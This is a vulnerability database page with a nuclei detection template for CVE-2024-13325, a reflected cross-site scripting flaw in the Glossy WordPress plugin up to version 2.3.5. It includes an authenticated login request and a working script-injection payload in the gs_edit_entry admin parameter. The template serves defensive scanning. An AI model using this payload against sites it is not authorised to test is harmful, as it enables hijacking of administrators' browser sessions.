Lucene search
K

Glossy WordPress - Reflected XSS

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Glossy WordPress plugin has reflected XSS via unsanitized parameter output requiring a user click.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13325
4 Feb 202506:08
circl
CNNVD
WordPress plugin Glossy 安全漏洞
4 Feb 202500:00
cnnvd
CVE
CVE-2024-13325
4 Feb 202506:00
cve
Cvelist
CVE-2024-13325 Glossy <= 2.3.5 - Reflected XSS
4 Feb 202506:00
cvelist
EUVD
EUVD-2024-51530
3 Oct 202520:07
euvd
NVD
CVE-2024-13325
4 Feb 202506:15
nvd
OSV
CVE-2024-13325
4 Feb 202506:15
osv
Patchstack
WordPress Glossy plugin <= 2.3.5 - Reflected XSS vulnerability
4 Feb 202522:13
patchstack
Positive Technologies
PT-2025-2111
4 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13325
8 Feb 202504:35
redhatcve
Rows per page
id: CVE-2024-13325

info:
  name: Glossy WordPress - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Glossy WordPress plugin v2.3.5 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to click a malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://wpscan.com/vulnerability/49bddf87-c578-47b7-a8fb-4dc550bbaa47/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13325
    cwe-id: CWE-79
    epss-score: 0.00567
    epss-percentile: 0.42907
    cpe: cpe:2.3:a:croberts:glossy:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: croberts
    product: glossy
  tags: cve,cve2024,croberts,glossy,authenticated,xss,wordpress,wp-plugin,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=glossy-add-entry&gs_edit_entry=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","glossy")
        condition: and
# digest: 4b0a00483046022100a0934a046fc689623dc884c7d9cba2cb4d6c9de377a3748cb26b5f3ef5b6f88a022100a283fe45d0f84ba53a71e3b5da26067a5543d9697a0073fc123e14047b36ac3c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 15:55Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00567
SSVC
12